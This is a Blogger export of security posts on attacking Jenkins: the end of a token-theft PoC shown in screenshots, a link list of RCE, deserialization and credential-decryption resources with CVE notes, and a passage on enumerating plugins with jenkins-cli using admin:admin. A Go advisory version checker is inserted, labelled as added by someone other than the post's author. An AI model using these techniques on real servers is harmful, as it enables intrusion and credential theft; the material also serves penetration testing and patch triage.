Tested against Jenkins 1.637</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">From the script console:</span></div>
<div class="sect2" style="background-color: white; box-sizing: border-box; color: #212529; text-align: left; text-indent: 0px;">
<div class="paragraph" style="box-sizing: border-box;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVmNUInFdYC07ZDI2NIGf00USGaP9VotMG6JjHjV9J0Em3Hs_apnmx8eGX79opGP5coF8xXbVT41YDGIG6o_wIEHW-oqobc9OrU6mjSlbcCQpLThLTi2rLusUdmmSZSRj_MzdzYIs4OG0/s1600/Screen+Shot+2019-02-27+at+6.59.18+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="898" data-original-width="1600" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVmNUInFdYC07ZDI2NIGf00USGaP9VotMG6JjHjV9J0Em3Hs_apnmx8eGX79opGP5coF8xXbVT41YDGIG6o_wIEHW-oqobc9OrU6mjSlbcCQpLThLTi2rLusUdmmSZSRj_MzdzYIs4OG0/s640/Screen+Shot+2019-02-27+at+6.59.18+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "times" , "times new roman" , serif; font-size: small;">run some groovy code to get the token of another user</span></td></tr>
</tbody></table>
<div style="color: #212529; font-style: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC9GFHa0FthKQrsDT9JsR-YGnAg_F4YoC6OmFzG681gGnAlNoRXHFNBXAEel2E7X1sVjTmUvVV8n0wqiMQy2WVAPMFGBA3gDNQoa0pHtPSUx45VBpoSu0sUCMLmFWgfs4d6w-apomhoCI/s1600/Screen+Shot+2019-02-27+at+6.59.33+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="317" data-original-width="1600" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC9GFHa0FthKQrsDT9JsR-YGnAg_F4YoC6OmFzG681gGnAlNoRXHFNBXAEel2E7X1sVjTmUvVV8n0wqiMQy2WVAPMFGBA3gDNQoa0pHtPSUx45VBpoSu0sUCMLmFWgfs4d6w-apomhoCI/s640/Screen+Shot+2019-02-27+at+6.59.33+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "times" , "times new roman" , serif; font-size: small;">wrong token</span></td></tr>
</tbody></table>
<div style="color: #212529; font-style: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOJ0PVmNV0U7SX6vErqrEwsAzxb5pNk4AyHtwXXapli4y0y50Y20YZ21H4r1VfDODeA_WDJksSlxMf3J-p2TOCod7ZXy8zeXjionfuBtU800LgUfaw08Gry2agDfU0-QE55Dwvhbt392U/s1600/Screen+Shot+2019-02-27+at+6.59.48+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="399" data-original-width="1600" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOJ0PVmNV0U7SX6vErqrEwsAzxb5pNk4AyHtwXXapli4y0y50Y20YZ21H4r1VfDODeA_WDJksSlxMf3J-p2TOCod7ZXy8zeXjionfuBtU800LgUfaw08Gry2agDfU0-QE55Dwvhbt392U/s640/Screen+Shot+2019-02-27+at+6.59.48+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "times" , "times new roman" , serif; font-size: small;">correct token</span></td></tr>
</tbody></table>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-76625409829889854722019-02-27T16:46:00.002-05:002019-03-05T14:02:39.149-05:00Jenkins Master Post<div style="background-color: white; box-sizing: border-box; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;">
<h4>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">A collection of posts on attacking Jenkins</span></h4>
<span style="font-family: "times" , "times new roman" , serif;">
</span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html" target="_blank">http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Manipulating build steps to get RCE</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://medium.com/@uranium238/shodan-jenkins-to-get-rces-on-servers-6b6ec7c960e2" target="_blank">https://medium.com/@uranium238/shodan-jenkins-to-get-rces-on-servers-6b6ec7c960e2</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Using the terminal plugin to get RCE</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://sharadchhetri.com/2018/12/02/managing-jenkins-plugins/" target="_blank">https://sharadchhetri.com/2018/12/02/managing-jenkins-plugins/</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Getting started with Jenkins Plugins</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" target="_blank">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Vulnerabilities in the following plugins:</span>
<ul>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Pipeline: Declarative Plugin up to and including 1.3.4</span></li>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Pipeline: Groovy Plugin up to and including 2.61</span></li>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Script Security Plugin up to and including 1.49</span></li>
</ul>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Blog post says: This issue has been fixed in Jenkins version 2.121.1 LTS (2.132 weekly).</span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" target="_blank">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2019-1003000 (https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266)</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/Coalfire-Research/java-deserialization-exploits/tree/master/Jenkins" target="_blank">https://github.com/Coalfire-Research/java-deserialization-exploits/tree/master/Jenkins</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream" target="_blank">https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2015-8103 & CVE-2016-0792</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/nixawk/labs/tree/master/CVE-2017-1000353" target="_blank">https://github.com/nixawk/labs/tree/master/CVE-2017-1000353</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353" target="_blank">https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353</a></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.twistlock.com/2017/06/18/jenkins-java-deserialization/" target="_blank">https://www.twistlock.com/2017/06/18/jenkins-java-deserialization/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2017-1000353 PoC</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://cloud.tencent.com/developer/article/1165414" target="_blank">https://cloud.tencent.com/developer/article/1165414</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/anntsmart/CVE" target="_blank">https://github.com/anntsmart/CVE</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2018-1999002 (windows) Arbitrary file read</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">
</span>
<br />
<blockquote class="tr_bq">
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">An arbitrary file read vulnerability exists in Jenkins 2.132 and earlier and 2.121.1 and earlier, in the Stapler web framework. </span><span style="font-family: "times" , "times new roman" , serif;">Under Windows, directories that don't exist can be traversed with ../, but not under Linux, so under Windows any file can be read through this vulnerability. Under Linux, you need to have a directory with _ in the Jenkins plugins directory.</span></span></blockquote>
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.crowdstrike.com/blog/your-jenkins-belongs-to-us-now-abusing-continuous-integration-systems/" target="_blank">https://www.crowdstrike.com/blog/your-jenkins-belongs-to-us-now-abusing-continuous-integration-systems/</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/" target="_blank">https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Decrypting credentials.xml </span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/" target="_blank">https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins, windows, powershell</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://securitynews.sonicwall.com/xmlpost/jenkins-ci-server-at-risk-high-risk-vulnerbaility/" target="_blank">https://securitynews.sonicwall.com/xmlpost/jenkins-ci-server-at-risk-high-risk-vulnerbaility/</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.zdnet.com/article/thousands-of-jenkins-servers-will-let-anonymous-users-become-admins/" target="_blank">https://www.zdnet.com/article/thousands-of-jenkins-servers-will-let-anonymous-users-become-admins/</a></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/" target="_blank">https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">CVE-2018-1999001: </span><span style="font-family: "times" , "times new roman" , serif;">a malformed request moves the config.xml file, and after a restart anyone can log in; couple it with a DoS (CVE-2018-1999043) to force the restart.</span></span><br />
<ul>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins weekly up to and including 2.132</span></li>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins LTS up to and including 2.121.1</span></li>
</ul>
<span style="font-family: "times" , "times new roman" , serif;">
</span><br />
<h4>
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><b>CG Posts:</b></span></span></h4>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-new-exploits-pt1.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-new-exploits-pt1.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Username enumeration Jenkins 2.137 and below</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-200-cve-2015-5323-poc.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-200-cve-2015-5323-poc.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Jenkins - SECURITY-200 / CVE-2015-5323 PoC (</span><span style="font-family: "times" , "times new roman" , serif;">API tokens of other users available to admins)</span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-180cve-2015-1814-poc.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-180cve-2015-1814-poc.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - SECURITY-180/CVE-2015-1814 PoC (Forced Token Change)</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Decrypting Jenkins credentials.xml </span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/03/jenkins-cve-2018-1000600-poc.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/03/jenkins-cve-2018-1000600-poc.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Jenkins - CVE</span></span><span style="color: #444444; font-family: times, times new roman, serif;">-2018-1000600 SSRF in GitHub plugin</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-exploits-pt2-cve.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-exploits-pt2-cve.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - CVE-2019-1003000 Pt 1</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/03/jenkins-messing-with-exploits-pt3-cve.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/03/jenkins-messing-with-exploits-pt3-cve.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - CVE-2019-1003000 Pt 2 - Orange Tsai exploit</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/03/jenkins-identify-ip-addresses-of-nodes.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/03/jenkins-identify-ip-addresses-of-nodes.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - Identify IP Addresses of nodes</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-86147936905173392022019-02-27T15:23:00.000-05:002019-02-27T20:26:57.124-05:00Jenkins - messing with exploits pt2 - CVE-2019-1003000<span style="color: #444444;">After the release of <a href="https://twitter.com/orange_8361/status/1097829220485496832" target="_blank">Orange Tsai's exploit</a> for Jenkins, I've been doing some poking. PreAuth RCE against Jenkins is something everyone wants.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">While not totally related to the blog post and tweet, the following exploit came up while searching.</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">What I have figured out is important is the plugin versions, as they relate to this latest round of Jenkins exploits. TBH I never paid much attention to the plugins in the past, as the issues had been with core Jenkins (as in the first blog post), but you can get a look at them by going to <span style="font-family: "courier new" , "courier" , monospace;">jenkins-server/pluginManager/installed</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5cOzbn6r1Hg80uzNmyu1N24lnNby6eO8cSDBctdGBbBRiJgfQuORsRiAqLiqlcRxDaGH8mBvwk2NuhE4PIlxSGFv-Mu2uqPij5mTmTF4i6W_G0v8IEpX6wjCwVQ4OHQg4fVhqrRsKa1g/s1600/Screen+Shot+2019-02-27+at+2.45.35+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: #444444;"><img border="0" data-original-height="858" data-original-width="1600" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5cOzbn6r1Hg80uzNmyu1N24lnNby6eO8cSDBctdGBbBRiJgfQuORsRiAqLiqlcRxDaGH8mBvwk2NuhE4PIlxSGFv-Mu2uqPij5mTmTF4i6W_G0v8IEpX6wjCwVQ4OHQg4fVhqrRsKa1g/s400/Screen+Shot+2019-02-27+at+2.45.35+PM.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444;">Jenkins plugin manager</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;">It does require admin permissions, or you get this:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSFxOoRL_xMEXml38voyG2NHMN9cKVaqPzzeWGyhVILoEdTTZTCX60DIT8xEanV4kq_snXeYXLA2B4LHv8s0ARluIU8wPLTY_wP1DREDlT7sbu1pf7V4sUk5DNXTqcnsEC2gt2EP226N4/s1600/Screen+Shot+2019-02-27+at+2.44.58+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="482" data-original-width="1490" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSFxOoRL_xMEXml38voyG2NHMN9cKVaqPzzeWGyhVILoEdTTZTCX60DIT8xEanV4kq_snXeYXLA2B4LHv8s0ARluIU8wPLTY_wP1DREDlT7sbu1pf7V4sUk5DNXTqcnsEC2gt2EP226N4/s400/Screen+Shot+2019-02-27+at+2.44.58+PM.png" width="400" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="color: #444444;">No permissions for Jenkins plugin manager</span></td></tr>
</tbody></table>
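<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;">Once you have the plugin inventory and the core version (Jenkins reports the latter in the <span style="font-family: 'courier new', courier, monospace;">X-Jenkins</span> response header), the next step is matching both against the advisories collected in the Master Post above. The following is an added example of mine, not code from the post or from Jenkins: it parses <span style="font-family: 'courier new', courier, monospace;">list-plugins</span>-style lines and compares versions numerically, so 1.3.4.1 is correctly treated as newer than 1.3.4, and an LTS version such as 2.121.1 is compared against the LTS bound rather than the weekly one. The version bounds are the ones quoted in the SECURITY-180, SECURITY-200 and Master Post entries on this page; the sample lines in Demo() are constructed input, and the plugin short names (script-security, workflow-cps, pipeline-model-definition) are the ones the CLI prints in its first column.</span></div>

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// cmpVersion compares dotted versions numerically ("1.3.4.1" > "1.3.4", "2.61" < "2.132");
// a component that is not a plain integer counts as 0, and a missing component counts as 0.
func cmpVersion(a, b string) int {
	x, y := strings.Split(a, "."), strings.Split(b, ".")
	for i := 0; i < len(x) || i < len(y); i++ {
		xi, yi := 0, 0
		if i < len(x) {
			xi, _ = strconv.Atoi(x[i])
		}
		if i < len(y) {
			yi, _ = strconv.Atoi(y[i])
		}
		if xi != yi {
			if xi < yi {
				return -1
			}
			return 1
		}
	}
	return 0
}

// Last affected core version per release line, as given in the posts on this page.
var coreAdvisories = []struct{ id, weekly, lts string }{
	{"SECURITY-180 / CVE-2015-1814 (forced API token change)", "1.605", "1.596.1"},
	{"SECURITY-200 / CVE-2015-5323 (API tokens of other users visible to admins)", "1.637", "1.625.1"},
	{"CVE-2018-1999001 (config.xml moved; pair with CVE-2018-1999043 DoS)", "2.132", "2.121.1"},
	{"CVE-2018-1999002 (Stapler arbitrary file read)", "2.132", "2.121.1"},
}

// Last affected plugin versions from the 2019-01-08 advisory (SECURITY-1266), keyed by the
// plugin short names the CLI prints in its first column.
var pluginAdvisories = map[string]string{
	"script-security":           "1.49",  // Script Security
	"workflow-cps":              "2.61",  // Pipeline: Groovy
	"pipeline-model-definition": "1.3.4", // Pipeline: Declarative
}

// CheckCore takes the X-Jenkins response header value. LTS versions have three components
// (2.121.1) and weeklies two (2.132); each must be compared against its own line.
func CheckCore(xJenkins string) []string {
	var hits []string
	lts := strings.Count(xJenkins, ".") == 2
	for _, a := range coreAdvisories {
		bound := a.weekly
		if lts {
			bound = a.lts
		}
		if cmpVersion(xJenkins, bound) <= 0 {
			hits = append(hits, a.id)
		}
	}
	return hits
}

// CheckPlugins parses `jenkins-cli list-plugins` output ("shortName Long Name version", with a
// trailing "(newer)" when an update exists) and returns shortName -> installed version for every
// plugin at or below its last affected version.
func CheckPlugins(listPluginsOutput string) map[string]string {
	hits := map[string]string{}
	for _, line := range strings.Split(listPluginsOutput, "\n") {
		f := strings.Fields(line)
		if len(f) < 3 {
			continue
		}
		version := f[len(f)-1]
		if strings.HasPrefix(version, "(") && len(f) > 3 {
			version = f[len(f)-2]
		}
		if bound, ok := pluginAdvisories[f[0]]; ok && cmpVersion(version, bound) <= 0 {
			hits[f[0]] = version
		}
	}
	return hits
}

// Demo runs both checks over constructed input: a header from a 2.121.1 LTS and a few lines in
// the list-plugins format (these are sample lines, not the output from the post).
func Demo() ([]string, map[string]string) {
	const sample = `
jsch JSch dependency plugin 0.1.55
script-security Script Security Plugin 1.49
workflow-cps Pipeline: Groovy 2.61 (2.63)
pipeline-model-definition Pipeline: Declarative 1.3.4.1
`
	return CheckCore("2.121.1"), CheckPlugins(sample)
}

func main() {
	core, plugins := Demo()
	fmt.Println("core advisories that apply:", core)
	fmt.Println("vulnerable plugins:", plugins)
}
```

<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;">For the sample input this flags script-security 1.49 and workflow-cps 2.61 but not pipeline-model-definition 1.3.4.1, and reports both 2018 core CVEs for a 2.121.1 LTS while leaving the 2015 ones out. Extend the two tables as new advisories land; a plain string comparison would get both the 1.3.4.1 case and the LTS-versus-weekly case wrong.</span></div>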
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;">If you do have permissions, you can also hit it with the jenkins-cli client and pull the info:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #444444;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">$ java -jar jenkins-cli.jar -s http://10.0.0.166:8080/ -auth admin:admin list-plugins</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jsch JSch dependency plugin 0.1.55</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">structs Structs Plugin 1.17</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">apache-httpcomponents-client-4-api Apache HttpComponents Client 4.x API Plugin 4.5.5-3.0</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">mailer Mailer Plugin 1.23</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">command-launcher Command Agent Launcher Plugin 1.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-api Pipeline: API 2.33</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-job Pipeline: Job 2.31</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">ssh-credentials SSH Credentials Plugin 1.14</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">authentication-tokens Authentication Tokens API Plugin 1.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-cps-global-lib Pipeline: Shared Groovy Libraries 2.13</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jackson2-api Jackson 2 API Plugin 2.9.8</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-stage-tags-metadata Pipeline: Stage Tags Metadata 1.3.4.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-milestone-step Pipeline: Milestone Step 1.3.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">credentials Credentials Plugin 2.1.18</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">lockable-resources Lockable Resources plugin 2.4</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">jquery-detached JavaScript GUI Lib: jQuery bundles (jQuery and jQuery UI) plugin 1.2.1</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">workflow-scm-step Pipeline: SCM Step 2.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">matrix-auth Matrix Authorization Strategy Plugin 2.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">matrix-project Matrix Project Plugin 1.13</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-stage-step Pipeline: Stage Step 2.3</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-build-step Pipeline: Build Step 2.7</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">pipeline-input-step Pipeline: Input Step 2.9</span></div>
<div class="separator" style="clear: both;">
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: xx-small;">bouncycastle-api bouncycastle API Plugin 2.17</span></div>
